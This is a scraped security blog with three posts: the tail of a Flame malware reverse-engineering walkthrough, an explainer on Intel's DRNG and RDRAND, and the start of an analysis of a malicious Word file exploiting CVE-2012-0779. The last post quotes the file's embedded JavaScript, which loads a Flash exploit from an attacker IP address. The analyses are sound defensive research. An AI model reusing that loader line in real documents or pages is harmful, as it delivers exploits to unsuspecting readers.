<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, <i>ebp+78h</i> points to <i>param_1</i>.</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Again, we go via Cross Reference to follow <i>param_1</i> and see:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100126FB</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push [ebp+arg_0]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100126FE</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call sub_100031FA</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><i> </i></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><i> </i></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><i>arg0</i> is our target! Another first parameter to follow, another Cross Reference to see:</span></div>
</span><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100033BA</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push [ebp+arg_0]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100033BD</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call sub_100126D5</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">But now we are in a very special function:</span></div>
</span><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100033A4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> UpdateTBSList proc near</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">It is an export function, but even knowing that, it doesn't make us retrieve the key as it is not called from within the executable module itself...!</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Here is a visual representation of the whole analysis we have done:</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD1gyMid2YfEOTt6W3CYF88mmML3_7ASLhX_mdPbeFHbzRP7gKGjvRfp1CQeUJemQ4nZDc4EFES859xHRJ-O4kyi0sSQnqE6FL0S5zEH-COxMDNfwexg3evvkz0_kL4a_TPhJDTuZj3l0/s1600/schema5-1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="448" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD1gyMid2YfEOTt6W3CYF88mmML3_7ASLhX_mdPbeFHbzRP7gKGjvRfp1CQeUJemQ4nZDc4EFES859xHRJ-O4kyi0sSQnqE6FL0S5zEH-COxMDNfwexg3evvkz0_kL4a_TPhJDTuZj3l0/s640/schema5-1.bmp" width="640" /></a></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I hope this discussion has given you an idea of how much such a kind of structured code can make things complicated... </span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">although we went very deeply in the code to track the key back, </span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">even at the end of our analysis, we didn't find its value!</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Are we close to it? Mmm... close enough at least :P</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">I'm not going to describe every single detail, but let's just think of the next logical step.</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">You may think about looking for the call to "UpdateTBSList" in the other components of Flame, but you won't find anything because the strings are encrypted! So, first you have to decrypt the strings and then you can look in every component of the malware to find where the export is called :)</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">But, even knowing that... once you have finally retrieved the key... what is it useful for? Was this time-consuming effort worth it?</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Well, it definitely is but, to understand why, you should conduct further investigation... :) This "never ending task" makes us think of the direction malware analysis is taking in these years: lot of effort, lot of patience, lot of dedication is required to perform even a small analysis like that!</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
</span><br />
<br /></div>
</span></span></div>
</span></div>
</span></span></div>
</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span></div>
</span></span></span></span></div>
</div>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-25711078846299573832012-05-22T16:03:00.000-07:002012-11-07T06:34:45.513-08:00A wide view of the Intel Digital Random Number Generator (DRNG)<span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">L</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">et's focus on two important lessons security history has taught us over the years:</span><br />
<ul>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Cryptography relies heavily on random numbers</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Implementing cryptography in the right way is not easy</span></li>
</ul>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">To point out and stress these concepts, I would like to recall a significant episode... Do you remember </span><a href="http://digitaloffense.net/tools/debian-openssl/"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Debian/OpenSSL Fiasco</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> in 2008? Briefly, due to some modifications to the code, as a side effect, the only "random" value that was used in the PRNG was the current process ID.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This resulted in t</span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">he</span></span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">PRNG</span></span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> having only 32,767</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">different possible seed values </span></span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">(i.e. the d</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">efault maximum process ID in Linux systems)</span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">, that means... a lot of people using the same keys to perform sensitive operations! Or... in other words, as </span></span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">a famous quote by Robert Coveyou</span></span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> says: "random number generation is too important to be left to chance"</span></span><span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.</span></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, wouldn't it be nice if we could rely on a high quality standard implementation, that is also performing, reliable </span><span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">under worst case assumptions</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> and secure against software attacks? Yes, of course. Is it possible? Well, lucky day... yes, it is!</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The news is quite recent and comes from Intel, who developed a </span><a href="http://software.intel.com/en-us/articles/intel-digital-random-number-generator-drng-software-implementation-guide/"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Digital Random Number Generator</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> (DRNG) following the Cascade Construction RNG model (however <a href="http://spectrum.ieee.org/computing/hardware/behind-intels-new-randomnumber-generator/">this isn't Intel's first attempt to provide RNG</a>). </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh548tCoHK6vxIWjzjmSvc15a8xK1aPyluIBghyxf-T0EASME2SJYnXftJlH00P3wOWscrfSWzi6PZfcgotwxTaK8NAzViE7vGA2YBLuNHuJHmQ4SUht_eY-JcCOp1IkfhTOHvmFJXB470/s1600/43773-drng-figure-1-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh548tCoHK6vxIWjzjmSvc15a8xK1aPyluIBghyxf-T0EASME2SJYnXftJlH00P3wOWscrfSWzi6PZfcgotwxTaK8NAzViE7vGA2YBLuNHuJHmQ4SUht_eY-JcCOp1IkfhTOHvmFJXB470/s400/43773-drng-figure-1-1.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The input is taken from an entropy source in order to supply an entropy pool. This pool is then used to provide nondeterministic random numbers that repeatedly seed a Cryptographically Secure PRNG (CSPRNG). Finally, the CSPRNG generates cryptographically secure random numbers.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Intel's DRNG is implemented in hardware on the processor itself, so the entropy source is built-in and is, indeed, a reliable source of high-quality entropy.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The implementation consists of three logical components that correspond to the ones described above, except for the entropy pool that is replaced by a conditioner to improve the performances.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://software.intel.com/file/43775" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAyweNUIeMPXo2MweffVRDAPKe3LlFnZj_q-N690PRKw0NJ0RslFedAkHOVuGdMi8Z23ar8lEjEX2S_57_9RlwTdCP3eeeaQsL0Ig9Y-1WKNwyUyDbtggWFsQlWeN786vEr575DwZKPX8/s1600/43775-drng-figure-3-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAyweNUIeMPXo2MweffVRDAPKe3LlFnZj_q-N690PRKw0NJ0RslFedAkHOVuGdMi8Z23ar8lEjEX2S_57_9RlwTdCP3eeeaQsL0Ig9Y-1WKNwyUyDbtggWFsQlWeN786vEr575DwZKPX8/s400/43775-drng-figure-3-1.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Here is how it is structured: </span><br />
<br />
<ul>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The entropy source uses thermal noise over the silicon in order to generate streams of random bits, which are then fed to an AES-CBC-MAC based conditioner. </span></li>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The conditioner combines pairs of blocks of 256 bit from the entropy source and produces one block of 256 bit that will seed the AES-CTR based Deterministic Random Bit Generator (DRBG), that is the hardware CSPRNG. </span></li>
<li><span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The DRBG provides a wider number of random bytes available from the hardware module: it generates long streams of bytes from the seed, thus improving the final number of random bytes being produced.</span></span></li>
</ul>
<br />
<div>
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Note that the employment of block ciphers in this contest is not a novelty and it is a </span><a href="http://csrc.nist.gov/groups/ST/toolkit/documents/rng/BlockCipherDRBGs.pdf"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">common approach in PRNG construction</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">, as modern block ciphers are designed to perform good pseudo-random permutations.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="color: #1e1e1e;"></span></span><span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Also, the hardware approach adopted by Intel gives additional advantages as the self-contained hardware module is isolated from software attacks on its internal state. </span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">How does a user interface to DRNG? A new </span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Intel 64 instruction is introduced: RDRAND. <a href="http://software.intel.com/en-us/articles/intel-digital-random-number-generator-drng-software-implementation-guide/">Intel documentation</a> provides all the necessary details to its usage, and also to determine whether the underlying platform supports the instruction (this can be done using the CPUID instruction).</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Basically, RDRAND can be invoked to obtain a 16-, 32-, or 64-bit random integer value. For example, "RDRAND eax" stores a 32-bit random number in eax.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">After calling it, t</span><span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">he carry flag will either be 1 if a random value was available at the time the RDRAND instruction was executed, or 0 if it wasn't.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">It seems that Intel is spending a lot of effort in providing crypto dedicated instructions (remember the </span><a href="http://software.intel.com/en-us/articles/intel-advanced-encryption-standard-aes-instructions-set/"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">AES instructions set</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">?) and I hope this trend will bring us many other ones. I think that it will take some years to see this implementation spreading around and become popular, but I also think this may be the solution to many practical problems in everyday cryptography: good work, Intel!</span></div>
<br />
<br />giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com4tag:blogger.com,1999:blog-8573685359056491736.post-64436500070077232942012-05-13T18:26:00.002-07:002012-05-14T00:08:29.885-07:00A look at object confusion vulnerability (CVE-2012-0779) in Adobe Flash<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Recently I noticed an interesting blog entry in <a href="http://contagiodump.blogspot.it/2012/05/may-3-cve-2012-0779-world-uyghur.html">contagiodump</a>: it was about a new attack using <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0779">CVE-2012-0779</a>, that involves a MS Word file named "World Uyghur Congress Invitation.doc". It got me curious, so I started analysing it.</span><br />
<div>
<br /></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">To investigate this file I used <a href="http://www.mcafee.com/us/downloads/free-tools/fileinsight.aspx">FileInsight</a>, it is a simple hex editor that supports OLE format. I searched in the object inside the ObjectPool field and found some useful information.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">In particular, you can find this object in the CompObj stream:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhbNTUa0tSeUsDSp0GGCyDKUjC4j3IGRR_gLq0sE5z1hwboy7T6si3Qd8C3IUfHR0RqmoTyxnL4C4Nvte0xnKahKt2_XgFluE3ylmYjfA8P4UaD-PKOTTOPnqkVzU-7Fcr68v6PMVv6EY/s1600/img3-1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhbNTUa0tSeUsDSp0GGCyDKUjC4j3IGRR_gLq0sE5z1hwboy7T6si3Qd8C3IUfHR0RqmoTyxnL4C4Nvte0xnKahKt2_XgFluE3ylmYjfA8P4UaD-PKOTTOPnqkVzU-7Fcr68v6PMVv6EY/s640/img3-1.bmp" width="640" /></a></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">and a CLSID in the OCXDATA stream:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-EOvOX42HG1Ew51BnW1pvbQPxJg5qahyukEavkLNKFxyod_WxhRrMpK-kAVQy4thjFFGqIXqoI8PfaNh2xWlecX3EJp_qMRNsFjhW4hqMDd5ZnpHOZtkNn1jgdePC6jHMoctRdFxatuA/s1600/img1-1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-EOvOX42HG1Ew51BnW1pvbQPxJg5qahyukEavkLNKFxyod_WxhRrMpK-kAVQy4thjFFGqIXqoI8PfaNh2xWlecX3EJp_qMRNsFjhW4hqMDd5ZnpHOZtkNn1jgdePC6jHMoctRdFxatuA/s640/img1-1.bmp" width="640" /></a></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Also, in the last screenshot you can notice a JavaScript code listing an url that points to a Flash file:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">javascript:eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))</span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I searched for this data and discovered that ScriptBridge is the name for AE24FDAE-03C6-11D1-8B76-0080C744F389, and found a </span><a href="http://blogs.technet.com/b/srd/archive/2009/03/03/behavior-of-activex-controls-embedded-in-office-documents.aspx"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">nice article</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">, explaining that this CLSID allows the navigation to an url without requiring any user interaction. This is really a powerful feature for malicious purposes!</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now let's focus on "essais.swf". This is a CWS file (a compressed SWF file), but we don't care about this detail as opening it with <a href="http://www.flash-decompiler.com/">Trillix</a> will unpack it by default.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This file is encoded by DoSwf:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqjhyphenhyphen7wtx36FNuS8kfJySGxGcnfc2QFX-FqfOgtkqmZuB_oJUuwJO4jvXAwIxFyb5aH2iZPR9mgsvTXFfNJbvh75tsuAdyeXwBkKMN4OYlixfJ3XXW11mQQBajysEBa4tC6QS8KnltsRI/s1600/img4.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqjhyphenhyphen7wtx36FNuS8kfJySGxGcnfc2QFX-FqfOgtkqmZuB_oJUuwJO4jvXAwIxFyb5aH2iZPR9mgsvTXFfNJbvh75tsuAdyeXwBkKMN4OYlixfJ3XXW11mQQBajysEBa4tC6QS8KnltsRI/s640/img4.bmp" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We need to unpack the DoSwf layer in order get to the exploit code, but Trillix fails at decompiling the ActionScript of the packed Flash file. So i searched for other similar Flash files related to this attack, and found "exp.swf" from the <a href="http://jsunpack.jeek.org/?report=48b3c77f602abc635f520eafb4690cc160e3acdd">jsunpack website</a>.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This time Trillix is able to show us the decompiled ActionScript code of the packer:</span><br />
